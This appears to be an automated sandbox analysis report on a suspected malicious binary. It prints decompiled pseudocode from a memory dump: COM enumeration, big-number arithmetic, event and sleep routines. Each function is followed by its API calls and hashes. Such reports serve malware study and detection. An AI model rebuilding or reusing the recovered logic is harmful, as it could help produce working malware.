                                                                                                                                  • Instruction Fuzzy Hash: 90512C76604609EFDB01CFA8D844ADEB7B5BF88750F148869F505DB260DB71EE06CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E00A35920(intOrPtr* __eax) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				WCHAR* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void* _v32;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				short _v48;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				short _v64;
                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				intOrPtr* _t58;
                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  				intOrPtr* _t63;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				short _t67;
                                                                                                                                  				intOrPtr* _t68;
                                                                                                                                  				intOrPtr* _t70;
                                                                                                                                  				intOrPtr* _t72;
                                                                                                                                  				intOrPtr* _t75;
                                                                                                                                  				intOrPtr* _t77;
                                                                                                                                  				intOrPtr _t79;
                                                                                                                                  				intOrPtr* _t83;
                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                  				intOrPtr _t103;
                                                                                                                                  				intOrPtr _t109;
                                                                                                                                  				void* _t118;
                                                                                                                                  				void* _t122;
                                                                                                                                  				void* _t123;
                                                                                                                                  				intOrPtr _t130;
                                                                                                                                  
                                                                                                                                  				_t123 = _t122 - 0x3c;
                                                                                                                                  				_push( &_v8);
                                                                                                                                  				_push(__eax);
                                                                                                                                  				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                  				if(_t118 >= 0) {
                                                                                                                                  					_t54 = _v8;
                                                                                                                                  					_t103 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t5 = _t103 + 0xa3e038; // 0x3050f485
                                                                                                                                  					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                  					_t56 = _v8;
                                                                                                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                  					if(_t118 >= 0) {
                                                                                                                                  						__imp__#2(0xa3c2b0);
                                                                                                                                  						_v28 = _t57;
                                                                                                                                  						if(_t57 == 0) {
                                                                                                                                  							_t118 = 0x8007000e;
                                                                                                                                  						} else {
                                                                                                                                  							_t60 = _v32;
                                                                                                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                  							_t87 = __imp__#6;
                                                                                                                                  							_t118 = _t61;
                                                                                                                                  							if(_t118 >= 0) {
                                                                                                                                  								_t63 = _v24;
                                                                                                                                  								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                  								if(_t118 >= 0) {
                                                                                                                                  									_t130 = _v20;
                                                                                                                                  									if(_t130 != 0) {
                                                                                                                                  										_t67 = 3;
                                                                                                                                  										_v64 = _t67;
                                                                                                                                  										_v48 = _t67;
                                                                                                                                  										_v56 = 0;
                                                                                                                                  										_v40 = 0;
                                                                                                                                  										if(_t130 > 0) {
                                                                                                                                  											while(1) {
                                                                                                                                  												_t68 = _v24;
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												_t123 = _t123;
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												asm("movsd");
                                                                                                                                  												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                  												if(_t118 < 0) {
                                                                                                                                  													goto L16;
                                                                                                                                  												}
                                                                                                                                  												_t70 = _v8;
                                                                                                                                  												_t109 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  												_t28 = _t109 + 0xa3e0bc; // 0x3050f1ff
                                                                                                                                  												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                  												if(_t118 >= 0) {
                                                                                                                                  													_t75 = _v16;
                                                                                                                                  													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                  													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                  														_t79 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  														_t33 = _t79 + 0xa3e078; // 0x76006f
                                                                                                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                  															_t83 = _v16;
                                                                                                                                  															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                  														}
                                                                                                                                  														 *_t87(_v12);
                                                                                                                                  													}
                                                                                                                                  													_t77 = _v16;
                                                                                                                                  													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                  												}
                                                                                                                                  												_t72 = _v8;
                                                                                                                                  												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                  												_v40 = _v40 + 1;
                                                                                                                                  												if(_v40 < _v20) {
                                                                                                                                  													continue;
                                                                                                                                  												}
                                                                                                                                  												goto L16;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								L16:
                                                                                                                                  								_t65 = _v24;
                                                                                                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                  							}
                                                                                                                                  							 *_t87(_v28);
                                                                                                                                  						}
                                                                                                                                  						_t58 = _v32;
                                                                                                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t118;
                                                                                                                                  			}






































                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(00A3C2B0), ref: 00A35970
                                                                                                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A35A51
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A35A6A
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00A35A99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloclstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1885612795-0
                                                                                                                                  • Opcode ID: f46e7efb683ebaf59c7362df591f1fcd7c6392bbbf99e675133834d8b99780d5
                                                                                                                                  • Instruction ID: 81bd079b08e3522d58c2c54706446da544b2386a682490fba8494c7d640e3642
                                                                                                                                  • Opcode Fuzzy Hash: f46e7efb683ebaf59c7362df591f1fcd7c6392bbbf99e675133834d8b99780d5
                                                                                                                                  • Instruction Fuzzy Hash: F3513C76D00519EFCB04DFE8C9889AEB7B9FF89744B148694F915EB210D731AD42CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                  			E00A37B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				void _v156;
                                                                                                                                  				void _v428;
                                                                                                                                  				void* _t55;
                                                                                                                                  				unsigned int _t56;
                                                                                                                                  				signed int _t66;
                                                                                                                                  				signed int _t74;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t79;
                                                                                                                                  				void* _t81;
                                                                                                                                  				void* _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				signed int* _t99;
                                                                                                                                  				signed int _t101;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				void* _t107;
                                                                                                                                  
                                                                                                                                  				_t92 = _a12;
                                                                                                                                  				_t101 = __eax;
                                                                                                                                  				_t55 = E00A347C4(_a16, _t92);
                                                                                                                                  				_t79 = _t55;
                                                                                                                                  				if(_t79 == 0) {
                                                                                                                                  					L18:
                                                                                                                                  					return _t55;
                                                                                                                                  				}
                                                                                                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                  				_t81 = 0;
                                                                                                                                  				_t96 = 0x20;
                                                                                                                                  				if(_t56 == 0) {
                                                                                                                                  					L4:
                                                                                                                                  					_t97 = _t96 - _t81;
                                                                                                                                  					_v12 = _t96 - _t81;
                                                                                                                                  					E00A3227C(_t79,  &_v428);
                                                                                                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00A33C06(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                                                  					E00A33C06(_t79,  &_v156, _a12, _t97);
                                                                                                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                                                  					_t66 = E00A3227C(_t101, 0xa3d168);
                                                                                                                                  					_t103 = _t101 - _t79;
                                                                                                                                  					_a8 = _t103;
                                                                                                                                  					if(_t103 < 0) {
                                                                                                                                  						L17:
                                                                                                                                  						E00A3227C(_a16, _a4);
                                                                                                                                  						E00A33450(_t79,  &_v428, _a4, _t97);
                                                                                                                                  						memset( &_v428, 0, 0x10c);
                                                                                                                                  						_t55 = memset( &_v156, 0, 0x84);
                                                                                                                                  						goto L18;
                                                                                                                                  					}
                                                                                                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                                                  					do {
                                                                                                                                  						if(_v8 != 0xffffffff) {
                                                                                                                                  							_push(1);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push( *_t99);
                                                                                                                                  							L00A3AED0();
                                                                                                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                  							asm("adc edx, esi");
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(_v8 + 1);
                                                                                                                                  							_push(_t92);
                                                                                                                                  							_push(_t74);
                                                                                                                                  							L00A3AECA();
                                                                                                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                  								_t74 = _t74 | 0xffffffff;
                                                                                                                                  								_v16 = _v16 & 0x00000000;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							_t74 =  *_t99;
                                                                                                                                  						}
                                                                                                                                  						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                                                  						_a12 = _t74;
                                                                                                                                  						_t76 = E00A32420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                                                  						while(1) {
                                                                                                                                  							 *_t99 =  *_t99 - _t76;
                                                                                                                                  							if( *_t99 != 0) {
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                  							L13:
                                                                                                                                  							_t92 =  &_v156;
                                                                                                                                  							if(E00A33F60(_t79, _t92, _t106) < 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							L14:
                                                                                                                                  							_a12 = _a12 + 1;
                                                                                                                                  							_t76 = E00A32775(_t79,  &_v156, _t106, _t106);
                                                                                                                                  							 *_t99 =  *_t99 - _t76;
                                                                                                                                  							if( *_t99 != 0) {
                                                                                                                                  								goto L14;
                                                                                                                                  							}
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						_a8 = _a8 - 1;
                                                                                                                                  						_t66 = _a12;
                                                                                                                                  						_t99 = _t99 - 4;
                                                                                                                                  						 *(0xa3d168 + _a8 * 4) = _t66;
                                                                                                                                  					} while (_a8 >= 0);
                                                                                                                                  					_t97 = _v12;
                                                                                                                                  					goto L17;
                                                                                                                                  				}
                                                                                                                                  				while(_t81 < _t96) {
                                                                                                                                  					_t81 = _t81 + 1;
                                                                                                                                  					_t56 = _t56 >> 1;
                                                                                                                                  					if(_t56 != 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L4;
                                                                                                                                  				}
                                                                                                                                  				goto L4;
                                                                                                                                  			}






















                                                                                                                                  APIs
                                                                                                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A37BE3
                                                                                                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A37BF9
                                                                                                                                  • memset.NTDLL ref: 00A37CA2
                                                                                                                                  • memset.NTDLL ref: 00A37CB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_allmul_aulldiv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3041852380-0
                                                                                                                                  • Opcode ID: 2b741298b51d49c5806776396873d227b54408e925b3b5a6b47cd340b9801128
                                                                                                                                  • Instruction ID: 70d73ccd3ed2c07ac7df926d14d85e6c62c9037cd060673537704b575c36c4ae
                                                                                                                                  • Opcode Fuzzy Hash: 2b741298b51d49c5806776396873d227b54408e925b3b5a6b47cd340b9801128
                                                                                                                                  • Instruction Fuzzy Hash: 1541C371A04219AFDF20EF68CD81BEEB775EF45310F104569F90AA7281DB709E44CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E00A37CC7(signed int _a4, signed int* _a8) {
                                                                                                                                  				void* __ecx;
                                                                                                                                  				void* __edi;
                                                                                                                                  				signed int _t6;
                                                                                                                                  				intOrPtr _t8;
                                                                                                                                  				intOrPtr _t12;
                                                                                                                                  				short* _t19;
                                                                                                                                  				void* _t25;
                                                                                                                                  				signed int* _t28;
                                                                                                                                  				CHAR* _t30;
                                                                                                                                  				long _t31;
                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                  
                                                                                                                                  				_t6 =  *0xa3d2a8; // 0xd448b889
                                                                                                                                  				_t32 = _a4;
                                                                                                                                  				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                  				_t8 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t3 = _t8 + 0xa3e876; // 0x61636f4c
                                                                                                                                  				_t25 = 0;
                                                                                                                                  				_t30 = E00A33CC2(_t3, 1);
                                                                                                                                  				if(_t30 != 0) {
                                                                                                                                  					_t25 = CreateEventA(0xa3d2e4, 1, 0, _t30);
                                                                                                                                  					E00A34AAB(_t30);
                                                                                                                                  				}
                                                                                                                                  				_t12 =  *0xa3d294; // 0x2000000a
                                                                                                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00A34A03() != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					_t28 = _a8;
                                                                                                                                  					if(_t28 != 0) {
                                                                                                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                  					}
                                                                                                                                  					_t31 = E00A31000(_t32, 0);
                                                                                                                                  					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                  					}
                                                                                                                                  					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                  					}
                                                                                                                                  					goto L20;
                                                                                                                                  				} else {
                                                                                                                                  					_t19 =  *0xa3d108( *_t32, 0x20);
                                                                                                                                  					if(_t19 != 0) {
                                                                                                                                  						 *_t19 = 0;
                                                                                                                                  						_t19 = _t19 + 2;
                                                                                                                                  					}
                                                                                                                                  					_t31 = E00A35AB2(0,  *_t32, _t19, 0);
                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                  						if(_t25 == 0) {
                                                                                                                                  							L22:
                                                                                                                                  							return _t31;
                                                                                                                                  						}
                                                                                                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                  						if(_t31 == 0) {
                                                                                                                                  							L20:
                                                                                                                                  							if(_t25 != 0) {
                                                                                                                                  								CloseHandle(_t25);
                                                                                                                                  							}
                                                                                                                                  							goto L22;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A33CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,033A9B38,00000000,?,?,69B25F44,00000005,00A3D00C,?,?,00A3539B), ref: 00A33CF8
                                                                                                                                    • Part of subcall function 00A33CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 00A33D1C
                                                                                                                                    • Part of subcall function 00A33CC2: lstrcat.KERNEL32(00000000,00000000), ref: 00A33D24
                                                                                                                                  • CreateEventA.KERNEL32(00A3D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A321B6,?,00000001,?), ref: 00A37D08
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,00A321B6,00000000,00000000,?,00000000,?,00A321B6,?,00000001,?,?,?,?,00A3555B), ref: 00A37D68
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00A321B6,?,00000001,?), ref: 00A37D96
                                                                                                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00A321B6,?,00000001,?,?,?,?,00A3555B), ref: 00A37DAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 73268831-0
                                                                                                                                  • Opcode ID: 665a85b67f9b6bdc9f94d9d3857774c8720941c15420ce3c9c96be4abeb8bd2a
                                                                                                                                  • Instruction ID: 09dd3b10facb6e6682d25ae265c65f13880e4173f0930141df9f726e6b8f7fe9
                                                                                                                                  • Opcode Fuzzy Hash: 665a85b67f9b6bdc9f94d9d3857774c8720941c15420ce3c9c96be4abeb8bd2a
                                                                                                                                  • Instruction Fuzzy Hash: B92107B2A047529BD7329FA89C84A7F7399FF89790F050725F986EB150DB70CC028B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1384045349-0
                                                                                                                                  • Opcode ID: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction ID: 0903cdbf6cd7a2f8dbe30e1ef9198d78cd119f97495db3acb285da0d538c4767
                                                                                                                                  • Opcode Fuzzy Hash: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction Fuzzy Hash: 5D4106B1C00258DFDB14CFE8C940BDDBBB8BF49308F108AA9E419AB281EB755A44CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 40%
                                                                                                                                  			E00A32107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t29;
                                                                                                                                  				void* _t38;
                                                                                                                                  				signed int* _t39;
                                                                                                                                  				void* _t40;
                                                                                                                                  
                                                                                                                                  				_t36 = __ecx;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v12 = _a4;
                                                                                                                                  				_t38 = E00A33946(__ecx,  &_v32);
                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                  					L12:
                                                                                                                                  					_t39 = _a8;
                                                                                                                                  					L13:
                                                                                                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                  						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                  						_t23 = _t16;
                                                                                                                                  						if( *_t16 != 0) {
                                                                                                                                  							E00A365EA(_t23);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t38;
                                                                                                                                  				}
                                                                                                                                  				if(E00A337AC(0x40,  &_v16) != 0) {
                                                                                                                                  					_v16 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t40 = CreateEventA(0xa3d2e4, 1, 0,  *0xa3d384);
                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                  					SetEvent(_t40);
                                                                                                                                  					Sleep(0xbb8);
                                                                                                                                  					CloseHandle(_t40);
                                                                                                                                  				}
                                                                                                                                  				_push( &_v32);
                                                                                                                                  				if(_a12 == 0) {
                                                                                                                                  					_t29 = E00A324BE(_t36);
                                                                                                                                  				} else {
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push(0);
                                                                                                                                  					_t29 = E00A3282B(_t36);
                                                                                                                                  				}
                                                                                                                                  				_t41 = _v16;
                                                                                                                                  				_t38 = _t29;
                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                  					E00A351BB(_t41);
                                                                                                                                  				}
                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                  					goto L12;
                                                                                                                                  				} else {
                                                                                                                                  					_t39 = _a8;
                                                                                                                                  					_t38 = E00A37CC7( &_v32, _t39);
                                                                                                                                  					goto L13;
                                                                                                                                  				}
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00A3D2E4,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,00A3555B,?,00000001,?), ref: 00A32158
                                                                                                                                  • SetEvent.KERNEL32(00000000,?,?,?,00A3555B,?,00000001,?,00000002,?,?,00A353C9,?), ref: 00A32165
                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,00A3555B,?,00000001,?,00000002,?,?,00A353C9,?), ref: 00A32170
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00A3555B,?,00000001,?,00000002,?,?,00A353C9,?), ref: 00A32177
                                                                                                                                    • Part of subcall function 00A324BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,00A32197,?,00A32197,?,?,?,?,?,00A32197,?), ref: 00A32598
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559942907-0
                                                                                                                                  • Opcode ID: 78d84fdc4baa19905cb25b844e8bfbabc9fab9da037757eb12d1f6c8b7068244
                                                                                                                                  • Instruction ID: ca8f39b030a1fd304dfbc535a71294db1314c234f9e5e8e9166800a42a0a5fe2
                                                                                                                                  • Opcode Fuzzy Hash: 78d84fdc4baa19905cb25b844e8bfbabc9fab9da037757eb12d1f6c8b7068244
                                                                                                                                  • Instruction Fuzzy Hash: A2214F73900219ABCF20AFE49E85AAEB7B9EB48360F058525FB15A7100D7749D468BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction ID: e7c625cf5c8ee33ed51a7d1beea6d955a464cdec547837539f31e2f1f58af872
                                                                                                                                  • Opcode Fuzzy Hash: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction Fuzzy Hash: C221D872E05631EFEB115AE98C44B5A776D9F47BA0F310521E955AB384F630ED008DD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E00A322D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                  				intOrPtr _t31;
                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                  				void* _t39;
                                                                                                                                  				int _t46;
                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                  				int _t48;
                                                                                                                                  
                                                                                                                                  				_t47 = __eax;
                                                                                                                                  				_push( &_v12);
                                                                                                                                  				_push(__eax);
                                                                                                                                  				_t39 = 0;
                                                                                                                                  				_t46 = 0;
                                                                                                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                  				_v8 = _t26;
                                                                                                                                  				if(_t26 < 0) {
                                                                                                                                  					L13:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				if(_v12 == 0) {
                                                                                                                                  					Sleep(0xc8);
                                                                                                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                  				}
                                                                                                                                  				if(_v8 >= _t39) {
                                                                                                                                  					_t28 = _v12;
                                                                                                                                  					if(_t28 != 0) {
                                                                                                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                  						_v8 = _t31;
                                                                                                                                  						if(_t31 >= 0) {
                                                                                                                                  							_t46 = lstrlenW(_v16);
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								_t46 = _t46 + 1;
                                                                                                                                  								_t48 = _t46 + _t46;
                                                                                                                                  								_t39 = E00A375F6(_t48);
                                                                                                                                  								if(_t39 == 0) {
                                                                                                                                  									_v8 = 0x8007000e;
                                                                                                                                  								} else {
                                                                                                                                  									memcpy(_t39, _v16, _t48);
                                                                                                                                  								}
                                                                                                                                  								__imp__#6(_v16);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t32 = _v12;
                                                                                                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                  					}
                                                                                                                                  					 *_a4 = _t39;
                                                                                                                                  					 *_a8 = _t46 + _t46;
                                                                                                                                  				}
                                                                                                                                  				goto L13;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1198164300-0
                                                                                                                                  • Opcode ID: d53a7901f54c1b6d50589fb35c001e06f3f0e7164f72585eae965ce46c6b602e
                                                                                                                                  • Instruction ID: 60510d24193566badc1d40067b308950b83f164af80fc7a67c8168655413647d
